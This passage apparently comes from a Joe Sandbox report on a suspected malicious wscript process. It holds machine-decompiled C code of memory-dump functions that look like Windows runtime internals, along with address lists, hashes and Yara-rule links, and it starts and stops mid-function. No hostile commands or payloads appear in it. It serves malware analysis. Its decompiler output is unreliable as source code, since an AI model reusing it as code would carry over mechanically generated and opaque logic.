									__eflags = _t82 -  *0x5a386b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x5a386bc;
										_t72 = 0x5a386b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E05949240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x5a386c4;
									_t72 = 0x5a386c0;
									L18:
									E05979B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x05949100
0x05949100
0x05949100
0x05949100
0x05949102
0x05949107
0x0594910c
0x05949110
0x05949115
0x05949136
0x05949143
0x059a37e4
0x059a37e4
0x05949149
0x0594914e
0x0594914e
0x05949117
0x0594911d
0x00000000
0x00000000
0x0594911f
0x05949125
0x00000000
0x05949151
0x05949158
0x0594915d
0x05949161
0x05949168
0x059a3715
0x00000000
0x0594916e
0x0594916e
0x05949175
0x05949177
0x0594917e
0x0594917f
0x05949182
0x05949182
0x05949187
0x05949187
0x0594918a
0x0594918d
0x0594918f
0x05949192
0x05949195
0x05949198
0x05949198
0x05949198
0x0594919a
0x00000000
0x00000000
0x059a371f
0x059a3721
0x059a3727
0x059a372f
0x059a3733
0x059a3735
0x059a3738
0x059a373b
0x059a373d
0x059a3740
0x00000000
0x00000000
0x059a3746
0x059a3749
0x00000000
0x00000000
0x059a374f
0x059a3751
0x00000000
0x00000000
0x059a3757
0x059a3759
0x059a375c
0x059a375c
0x059a375e
0x059a375e
0x059a3761
0x059a3764
0x00000000
0x00000000
0x059a3766
0x059a3768
0x059a37a3
0x059a37a3
0x059a37a5
0x059a37a7
0x059a37ad
0x059a37b0
0x059a37b2
0x059a37bc
0x059a37c2
0x059a37c2
0x059a37b2
0x05949187
0x05949187
0x0594918a
0x0594918d
0x0594918f
0x05949192
0x05949195
0x00000000
0x05949195
0x00000000
0x05949187
0x059a376a
0x059a376a
0x059a376c
0x059a376c
0x059a376f
0x059a3775
0x00000000
0x00000000
0x059a3777
0x059a3779
0x00000000
0x00000000
0x059a3782
0x059a3787
0x059a3789
0x059a3790
0x059a3790
0x059a378b
0x059a378b
0x059a378b
0x059a3792
0x059a3795
0x059a3795
0x059a3798
0x059a3798
0x059a379b
0x059a379b
0x059491a3
0x059491a9
0x059491b0
0x059491b4
0x059491b4
0x059491bb
0x059491c0
0x059491c5
0x059491c7
0x059a37da
0x059491cd
0x059491cd
0x059491cd
0x059491d2
0x059491d5
0x05949239
0x05949239
0x059491d7
0x059491db
0x059491e1
0x059491e7
0x059491fd
0x05949203
0x0594921e
0x05949223
0x00000000
0x05949223
0x05949205
0x05949208
0x0594920c
0x05949214
0x05949214
0x059491e9
0x059491e9
0x059491ee
0x059491f3
0x059491f3
0x059491f3
0x059491e7
0x00000000
0x059491db
0x05949187
0x05949168

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: adcc2f08a0d3cb1c5907e9b34b7c5468547f583bab89506297f7e7b7e16d6d4d
Instruction ID: da70884ffa183603fd0cdcc869e45aed42c3d5ba607a1c862d06cf76791e3135
Opcode Fuzzy Hash: adcc2f08a0d3cb1c5907e9b34b7c5468547f583bab89506297f7e7b7e16d6d4d
Instruction Fuzzy Hash: 30310271A05285DFDB26DF68C688FAEBBF6BB8D354F188559E40567240C334AD80CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 05960050 Relevance: .1, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E05960050(void* __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t30;
				intOrPtr* _t31;
				signed int _t34;
				void* _t40;
				void* _t41;
				signed int _t44;
				intOrPtr _t47;
				signed int _t58;
				void* _t59;
				void* _t61;
				void* _t62;
				signed int _t64;

				_push(__ecx);
				_v8 =  *0x5a3d360 ^ _t64;
				_t61 = __ecx;
				_t2 = _t61 + 0x20; // 0x20
				E05979ED0(_t2, 1, 0);
				_t52 =  *(_t61 + 0x8c);
				_t4 = _t61 + 0x8c; // 0x8c
				_t40 = _t4;
				do {
					_t44 = _t52;
					_t58 = _t52 & 0x00000001;
					_t24 = _t44;
					asm("lock cmpxchg [ebx], edx");
					_t52 = _t44;
				} while (_t52 != _t44);
				if(_t58 == 0) {
					L7:
					_pop(_t59);
					_pop(_t62);
					_pop(_t41);
					return E0598B640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
				}
				asm("lock xadd [esi], eax");
				_t47 =  *[fs:0x18];
				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
				if(_t30 != 0) {
					if( *_t30 == 0) {
						goto L4;
					}
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					L5:
					if( *_t31 != 0) {
						_t18 = _t61 + 0x78; // 0x78
						E05A18A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
					}
					_t52 =  *(_t61 + 0x5c);
					_t11 = _t61 + 0x78; // 0x78
					_t34 = E05979702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
					_t24 = _t34 | 0xffffffff;
					asm("lock xadd [esi], eax");
					if((_t34 | 0xffffffff) == 0) {
						 *0x5a3b1e0(_t61);
						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
					}
					goto L7;
				}
				L4:
				_t31 = 0x7ffe0386;
				goto L5;
			}

0x05960055
0x0596005d
0x05960062
0x0596006c
0x0596006f
0x05960074
0x0596007a
0x0596007a
0x05960080
0x05960080
0x05960087
0x0596008d
0x0596008f
0x05960093
0x05960095
0x0596009b
0x059600f8
0x059600fb
0x059600fc
0x059600ff
0x05960108
0x05960108
0x059600a2
0x059600a6
0x059600b3
0x059600bc
0x059600c5
0x059600ca
0x059ac01e
0x00000000
0x00000000
0x059ac02d
0x059600d5
0x059600d9
0x059ac03d
0x059ac046
0x059ac046
0x059600df
0x059600e2
0x059600ea
0x059600ef
0x059600f2
0x059600f6
0x05960111
0x05960117
0x05960117
0x00000000
0x059600f6
0x059600d0
0x059600d0
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: caa43f32d4ba3995773f5083e2759026f45d185b37a700453d0a0db030cd3f27
Instruction ID: 97c40382979379bc7a605fa2be73705b7e9a41da047644f0f3ddf4f5dff2a7c1
Opcode Fuzzy Hash: caa43f32d4ba3995773f5083e2759026f45d185b37a700453d0a0db030cd3f27
Instruction Fuzzy Hash: 21319131201B04CFDB21CF28C988BAAB7E6FF88714F14456DE49687790EB75AC05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 059C6C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E059C6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E05967D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x5a37b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L05964620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0598F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E05967D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E05989AE0();
						_t23 = L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x059c6c0a
0x059c6c0f
0x059c6c10
0x059c6c13
0x059c6c15
0x059c6c19
0x059c6c1c
0x059c6c21
0x059c6c28
0x059c6c3a
0x059c6c2a
0x059c6c33
0x059c6c33
0x059c6c3f
0x059c6c48
0x059c6c4d
0x059c6c60
0x059c6c65
0x059c6c69
0x059c6c73
0x059c6c79
0x059c6c7f
0x059c6c86
0x059c6c90
0x059c6c94
0x059c6ca6
0x059c6cb2
0x059c6cbd
0x059c6cbd
0x059c6cc3
0x059c6cc7
0x059c6ccb
0x059c6cd0
0x059c6cd1
0x059c6ce2
0x059c6ce2
0x059c6c69
0x059c6ced

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e55b1324729072eb4fdd68dd9f4c00b52253601662f67f44ed47da321fd0fc1a
Instruction ID: ac2adf5994288f67bb47f85babacaedb6189a91023125e1ef5369e2870beadf5
Opcode Fuzzy Hash: e55b1324729072eb4fdd68dd9f4c00b52253601662f67f44ed47da321fd0fc1a
Instruction Fuzzy Hash: 72218BB1A00644AFD715DFA8D884E6AB7B8FF48744F1400A9F909D7791D634ED10CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 059890AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E059890AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0599D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0597E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L05964620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0598F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0597A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x059890af
0x059890b8
0x059890bb
0x059890bf
0x059890c2
0x059890c2
0x059890c8
0x059890cb
0x059890cd
0x059c14d7
0x059c14eb
0x059c14eb
0x00000000
0x059c14eb
0x059c14db
0x059c14e6
0x00000000
0x059c14f2
0x059c14e8
0x00000000
0x059c14e8
0x059890d8
0x059890da
0x059890dd
0x059890e5
0x00000000
0x05989139
0x059890fa
0x059890fe
0x05989142
0x00000000
0x05989142
0x05989104
0x05989107
0x0598910b
0x05989110
0x05989118
0x05989147
0x05989148
0x0598914f
0x05989150
0x05989151
0x05989152
0x05989156
0x0598915d
0x05989160
0x05989168
0x0598916c
0x059891bc
0x059891be
0x00000000
0x059891be
0x0598916e
0x05989173
0x05989176
0x00000000
0x00000000
0x0598917c
0x05989180
0x059891b5
0x00000000
0x059891b5
0x05989182
0x05989185
0x05989189
0x00000000
0x00000000
0x0598918e
0x05989190
0x05989198
0x00000000
0x00000000
0x059891a0
0x00000000
0x059891ad
0x059891ad
0x059891b0
0x059891b1
0x00000000
0x05989185
0x0598911a
0x0598911c
0x0598911f
0x05989125
0x05989127
0x00000000

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: cdc8b67ecddda2472007f7896e74bd9ff563f6b90ef7c7d1f88d7781c78aa6e0
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: 65215371A04208EFDB21EF59C544E7AFBF9EB44750F1488AAE94597250D334FD44DB50

Uniqueness

Uniqueness Score: -1.00%

Function 05973B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E05973B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x5a384c4; // 0x0
				_v12 = 1;
				_v8 =  *0x5a384c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L05964620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x5a384c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0598AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0598FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x5a384c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x5a384c4; // 0x0
					L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x05973b89
0x05973b96
0x05973ba1
0x05973bab
0x05973bb5
0x05973bb9
0x059b6298
0x05973bbf
0x05973bc2
0x05973bc3
0x05973bc9
0x05973bca
0x05973bcc
0x05973bcd
0x05973bd4
0x05973bd6
0x05973bdb
0x05973bea
0x05973bf7
0x05973bfb
0x05973bff
0x05973c09
0x05973c0a
0x05973c0b
0x05973c0f
0x05973c14
0x05973c18
0x05973c18
0x05973bfb
0x05973c1b
0x05973c30
0x05973c30
0x05973c3d

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfd95a45a210d8596cb8ac414f64a1f2011b2c7b1e4660d4897d5a8b8c105377
Instruction ID: 168960f19ba811d7a31915aacbd84fd4f8e45c988904bd8c921c4683d526e270
Opcode Fuzzy Hash: dfd95a45a210d8596cb8ac414f64a1f2011b2c7b1e4660d4897d5a8b8c105377
Instruction Fuzzy Hash: 5421B0B2A00109AFDB00DF98CD81B6EBBBDFB40308F250469FA09AB251D775ED01DB90

Uniqueness

Uniqueness Score: -1.00%

Function 059C6CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E059C6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E05967D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E05967D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x5925c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0597F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0597F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E059C7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L05962400( &_v52);
								}
								_t21 = L05962400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x059c6cfb
0x059c6d00
0x059c6d02
0x059c6d06
0x059c6d0a
0x059c6d0e
0x059c6d19
0x059c6d2b
0x059c6d1b
0x059c6d24
0x059c6d24
0x059c6d33
0x059c6d39
0x059c6d46
0x059c6d4f
0x059c6d61
0x059c6d51
0x059c6d5a
0x059c6d5a
0x059c6d69
0x059c6d6b
0x059c6d6d
0x059c6d6f
0x059c6d6f
0x059c6d74
0x059c6d79
0x059c6d7a
0x059c6d7f
0x059c6d82
0x059c6d88
0x059c6d89
0x059c6d90
0x059c6d94
0x059c6da7
0x059c6db1
0x059c6db1
0x059c6dbb
0x059c6dbb
0x059c6d90
0x059c6d69
0x059c6d46
0x059c6dc6

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b32fcdd6a12667bfae4cb7da1307941c98c3b33aaff50110f96d28f663346927
Instruction ID: b9cd8625fc1a86b4e8a6f164cd4508c6f42793f983a03362092b4aa0cf5b4597
Opcode Fuzzy Hash: b32fcdd6a12667bfae4cb7da1307941c98c3b33aaff50110f96d28f663346927
Instruction Fuzzy Hash: D621B3725047559BC711EF69CD48B6BBBECFFC1644F04099AB94187251E734D908C6A3

Uniqueness

Uniqueness Score: -1.00%

Function 05A1070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E05A1070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E05A107DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E05A0AFDE( &_v8,  &_v12);
					E05A11293(_t38, _v28, _t60);
					if(E05967D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E05A014FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x05a1071b
0x05a10724
0x05a10734
0x05a10738
0x05a1074b
0x05a1074b
0x05a10753
0x05a10753
0x05a10759
0x05a1075d
0x05a10774
0x05a10779
0x05a1077d
0x05a10789
0x05a10795
0x05a107a7
0x05a10797
0x05a107a0
0x05a107a0
0x05a107af
0x05a107c4
0x05a107cd
0x05a107cd
0x05a107af
0x05a107dc

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: 1b38f6e26183c4ec4bb1adefb2249e348293fd9c613ea3d441eb927a2113d19d
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: 5021F2363086049FD705DF18C888E6ABBA6FBC4350F088569FD958B381D630D949CB95

Uniqueness

Uniqueness Score: -1.00%

Function 059C7794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E059C7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x5a37b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L05964620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0598F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E05967D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E05989AE0();
					_t24 = L059677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x059c7799
0x059c779a
0x059c779b
0x059c77a3
0x059c77ab
0x059c77ae
0x059c77b1
0x059c77b1
0x059c77bf
0x059c77c4
0x059c77c8
0x059c77ce
0x059c77d4
0x059c77e0
0x059c77e0
0x059c77d6
0x059c77d6
0x059c77de
0x00000000
0x00000000
0x059c77de
0x059c77e5
0x059c77f0
0x059c77f3
0x059c77f6
0x059c77fd
0x059c7800
0x059c780c
0x059c7818
0x059c782b
0x059c781a
0x059c7823
0x059c7823
0x059c7830
0x059c7831
0x059c7838
0x059c783d
0x059c783e
0x059c784f
0x059c784f
0x059c785a

Memory Dump Source

Source File: 00000001.00000002.566831763.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: true

Associated: 00000001.00000002.569224633.0000000005A3B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.569256565.0000000005A3F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_5920000_wscript.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47f6b4ee9ed60aa9c0ed0dda766c3d02d10b62cf168aadcee15fb72ff4c59089
Instruction ID: c6f13371290e68c8959f658a87a2443ee6b38f91711439590035ed5c4b3577a3
Opcode Fuzzy Hash: 47f6b4ee9ed60aa9c0ed0dda766c3d02d10b62cf168aadcee15fb72ff4c59089
Instruction Fuzzy Hash: 4B219F72600604AFC725DFA9D894E6BBBBDFF88740F14056DF60AC7650D634E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0596AE73 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E0596AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E05967D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E05967D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E05967D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E05967D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
